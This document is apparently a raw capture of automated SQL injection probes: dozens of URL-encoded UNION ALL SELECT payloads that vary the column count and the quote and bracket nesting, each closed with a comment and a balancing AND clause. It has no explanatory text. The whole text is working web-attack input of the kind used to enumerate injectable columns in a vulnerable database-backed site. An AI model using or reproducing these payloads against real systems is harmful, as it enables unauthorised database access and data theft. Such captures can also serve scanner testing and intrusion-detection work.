-8227%22%29%29%20UNION%20ALL%20SELECT%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822--%20%20AND%20%28%28%22KjDK%22%3D%22KjDK -4783%22%29%29%20UNION%20ALL%20SELECT%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367--%20%20AND%20%28%28%22zeGa%22%3D%22zeGa -2092%22%29%29%20UNION%20ALL%20SELECT%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079--%20%20AND%20%28%28%22vBVC%22%3D%22vBVC -5778%22%29%29%20UNION%20ALL%20SELECT%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541--%20%20AND%20%28%28%22lank%22%3D%22lank -8638%22%29%29%20UNION%20ALL%20SELECT%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612--%20%20AND%20%28%28%22XUil%22%3D%22XUil -9669%22%29%29%20UNION%20ALL%20SELECT%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181--%20%20AND%20%28%28%22SUlT%22%3D%22SUlT -1129%22%29%29%29%20UNION%20ALL%20SELECT%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677--%20%20AND%20%28%28%28%22CnuD%22%3D%22CnuD -3315%22%29%29%29%20UNION%20ALL%20SELECT%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607--%20%20AND%20%28%28%28%22MoNc%22%3D%22MoNc -9414%22%29%29%29%20UNION%20ALL%20SELECT%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836--%20%20AND%20%28%28%28%22fxDu%22%3D%22fxDu -8392%22%29%29%29%20UNION%20ALL%20SELECT%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874%2C%209874--%20%20AND%20%28%28%28%22TMpS%22%3D%22TMpS -6972%22%29%29%29%20UNION%20ALL%20SELECT%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354%2C%208354--%20%20AND%20%28%28%28%22HhkS%22%3D%22HhkS -8288%22%29%29%29%20UNION%20ALL%20SELECT%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677--%20%20AND%20%28%28%28%22CWqs%22%3D%22CWqs -2388%22%29%29%29%20UNION%20ALL%20SELECT%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382--%20%20AND%20%28%28%28%22czvg%22%3D%22czvg -8393%22%29%29%29%20UNION%20ALL%20SELECT%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436--%20%20AND%20%28%28%28%22DuNu%22%3D%22DuNu -1340%22%29%29%29%20UNION%20ALL%20SELECT%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079--%20%20AND%20%28%28%28%22EYjJ%22%3D%22EYjJ -3035%22%29%29%29%20UNION%20ALL%20SELECT%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742--%20%20AND%20%28%28%28%22PoDm%22%3D%22PoDm -1020%22%20UNION%20ALL%20SELECT%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226--%20%20AND%20%22sMSH%22%3D%22sMSH -6474%22%20UNION%20ALL%20SELECT%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059--%20%20AND%20%22SGbR%22%3D%22SGbR -2416%22%20UNION%20ALL%20SELECT%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207%2C%207207--%20%20AND%20%22JOFi%22%3D%22JOFi -9380%22%20UNION%20ALL%20SELECT%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737--%20%20AND%20%22pqLG%22%3D%22pqLG -2691%22%20UNION%20ALL%20SELECT%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910--%20%20AND%20%22YSvq%22%3D%22YSvq -7711%22%20UNION%20ALL%20SELECT%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970--%20%20AND%20%22TcHG%22%3D%22TcHG -2188%22%20UNION%20ALL%20SELECT%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340--%20%20AND%20%22CYKV%22%3D%22CYKV -3404%22%20UNION%20ALL%20SELECT%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082%2C%208082--%20%20AND%20%22MNDc%22%3D%22MNDc -4164%22%20UNION%20ALL%20SELECT%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423%2C%209423--%20%20AND%20%22ihAw%22%3D%22ihAw -8272%22%20UNION%20ALL%20SELECT%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793--%20%20AND%20%22itnW%22%3D%22itnW -4362%22%29%20UNION%20ALL%20SELECT%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479%2C%201479--%20%20AND%20%28%22ImTG%22%20LIKE%20%22ImTG -8556%22%29%20UNION%20ALL%20SELECT%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850--%20%20AND%20%28%22JHBV%22%20LIKE%20%22JHBV -8394%22%29%20UNION%20ALL%20SELECT%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812%2C%209812--%20%20AND%20%28%22yAkH%22%20LIKE%20%22yAkH -7926%22%29%20UNION%20ALL%20SELECT%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100--%20%20AND%20%28%22FgWb%22%20LIKE%20%22FgWb -2692%22%29%20UNION%20ALL%20SELECT%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866--%20%20AND%20%28%22PIoN%22%20LIKE%20%22PIoN -2158%22%29%20UNION%20ALL%20SELECT%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933--%20%20AND%20%28%22BGrS%22%20LIKE%20%22BGrS -4457%22%29%20UNION%20ALL%20SELECT%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148%2C%204148--%20%20AND%20%28%22hXAU%22%20LIKE%20%22hXAU -9194%22%29%20UNION%20ALL%20SELECT%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735--%20%20AND%20%28%22LFZI%22%20LIKE%20%22LFZI -3818%22%29%20UNION%20ALL%20SELECT%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681--%20%20AND%20%28%22TvHX%22%20LIKE%20%22TvHX -6437%22%29%20UNION%20ALL%20SELECT%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730%2C%207730--%20%20AND%20%28%22akdN%22%20LIKE%20%22akdN -4076%22%29%29%20UNION%20ALL%20SELECT%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954--%20%20AND%20%28%28%22AxpC%22%20LIKE%20%22AxpC -5223%22%29%29%20UNION%20ALL%20SELECT%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398%2C%202398--%20%20AND%20%28%28%22RLjc%22%20LIKE%20%22RLjc -1490%22%29%29%20UNION%20ALL%20SELECT%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834--%20%20AND%20%28%28%22sgUN%22%20LIKE%20%22sgUN -3123%22%29%29%20UNION%20ALL%20SELECT%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456--%20%20AND%20%28%28%22ljZt%22%20LIKE%20%22ljZt -4776%22%29%29%20UNION%20ALL%20SELECT%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967%2C%205967--%20%20AND%20%28%28%22ELpZ%22%20LIKE%20%22ELpZ -6961%22%29%29%20UNION%20ALL%20SELECT%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163%2C%202163--%20%20AND%20%28%28%22lmmu%22%20LIKE%20%22lmmu -8707%22%29%29%20UNION%20ALL%20SELECT%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854--%20%20AND%20%28%28%22BkSQ%22%20LIKE%20%22BkSQ -5596%22%29%29%20UNION%20ALL%20SELECT%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102--%20%20AND%20%28%28%22lkVy%22%20LIKE%20%22lkVy -4686%22%29%29%20UNION%20ALL%20SELECT%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383--%20%20AND%20%28%28%22sFtM%22%20LIKE%20%22sFtM 